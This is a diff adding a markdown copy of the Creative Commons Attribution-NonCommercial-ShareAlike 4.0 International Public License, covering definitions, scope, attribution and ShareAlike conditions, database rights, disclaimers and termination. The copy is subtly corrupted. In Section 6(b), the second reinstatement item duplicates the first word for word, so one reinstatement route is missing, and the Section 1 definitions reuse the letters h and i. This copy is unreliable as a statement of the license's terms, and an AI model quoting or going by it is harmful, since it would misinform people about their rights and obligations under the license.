+By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
+
+### Section 1 – Definitions.
+
+a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
+
+b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License.
+
+c. __BY-NC-SA Compatible License__ means a license listed at [creativecommons.org/compatiblelicenses](http://creativecommons.org/compatiblelicenses), approved by Creative Commons as essentially the equivalent of this Public License.
+
+d. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.
+
+e. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements.
+
+f. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material.
+
+g. __License Elements__ means the license attributes listed in the name of a Creative Commons Public License. The License Elements of this Public License are Attribution, NonCommercial, and ShareAlike.
+
+h. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License.
+
+i. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license.
+
+h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License.
+
+i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange.
+
+j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them.
+
+k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
+
+l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
+
+### Section 2 – Scope.
+
+a. ___License grant.___
+
+ 1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:
+
+ A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and
+
+ B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only.
+
+ 2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions.
+
+ 3. __Term.__ The term of this Public License is specified in Section 6(a).
+
+ 4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material.
+
+ 5. __Downstream recipients.__
+
+ A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.
+
+ B. __Additional offer from the Licensor – Adapted Material.__ Every recipient of Adapted Material from You automatically receives an offer from the Licensor to exercise the Licensed Rights in the Adapted Material under the conditions of the Adapter’s License You apply.
+
+ C. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material.
+
+ 6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).
+
+b. ___Other rights.___
+
+ 1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.
+
+ 2. Patent and trademark rights are not licensed under this Public License.
+
+ 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
+
+### Section 3 – License Conditions.
+
+Your exercise of the Licensed Rights is expressly made subject to the following conditions.
+
+a. ___Attribution.___
+
+ 1. If You Share the Licensed Material (including in modified form), You must:
+
+ A. retain the following if it is supplied by the Licensor with the Licensed Material:
+
+ i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated);
+
+ ii. a copyright notice;
+
+ iii. a notice that refers to this Public License;
+
+ iv. a notice that refers to the disclaimer of warranties;
+
+ v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;
+
+ B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and
+
+ C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License.
+
+ 2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information.
+
+ 3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable.
+
+b. ___ShareAlike.___
+
+In addition to the conditions in Section 3(a), if You Share Adapted Material You produce, the following conditions also apply.
+
+ 1. The Adapter’s License You apply must be a Creative Commons license with the same License Elements, this version or later, or a BY-NC-SA Compatible License.
+
+ 2. You must include the text of, or the URI or hyperlink to, the Adapter's License You apply. You may satisfy this condition in any reasonable manner based on the medium, means, and context in which You Share Adapted Material.
+
+ 3. You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, Adapted Material that restrict exercise of the rights granted under the Adapter's License You apply.
+
+### Section 4 – Sui Generis Database Rights.
+
+Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
+
+a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only;
+
+b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material, including for purposes of Section 3(b); and
+
+c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database.
+
+For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
+
+### Section 5 – Disclaimer of Warranties and Limitation of Liability.
+
+a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
+
+b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__
+
+c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
+
+### Section 6 – Term and Termination.
+
+a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
+
+b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:
+
+ 1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
+
+ 2. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
+
+ For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License.
+
+c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License.
+
+d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
+
+### Section 7 – Other Terms and Conditions.
+
+a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
+
+b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
+
+### Section 8 – Interpretation.
+
+a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
+
+b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions.
+
+c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor.
+
+d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.
+
+```
+Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
+
+Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
+```